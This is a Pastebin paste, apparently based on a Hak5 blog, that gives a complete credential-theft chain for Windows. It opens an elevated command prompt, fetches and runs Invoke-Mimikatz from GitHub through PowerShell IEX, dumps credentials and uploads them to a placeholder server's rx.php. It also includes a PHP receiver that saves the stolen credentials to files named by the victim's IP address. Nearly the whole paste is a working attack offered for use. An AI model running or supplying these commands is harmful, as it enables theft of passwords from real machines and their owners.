Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #based on notes from https://www.hak5.org/blog/15-second-password-hack-mr-robot-style
- #Start CMD as Admin
- powershell Start-Process cmd -Verb runAs
- #get "Invoke Minikatz
- powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1');
- #Dump to var
- $output = Invoke-Mimikatz -DumpCreds;
- #upload output
- (New-Object Net.WebClient).UploadString('http://<server>/rx.php', $output)"
- #simple PHP dump to file with timestamp
- <?php
- $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
- file_put_contents($file, file_get_contents("php://input"));
- ?>
Add Comment
Please, Sign In to add comment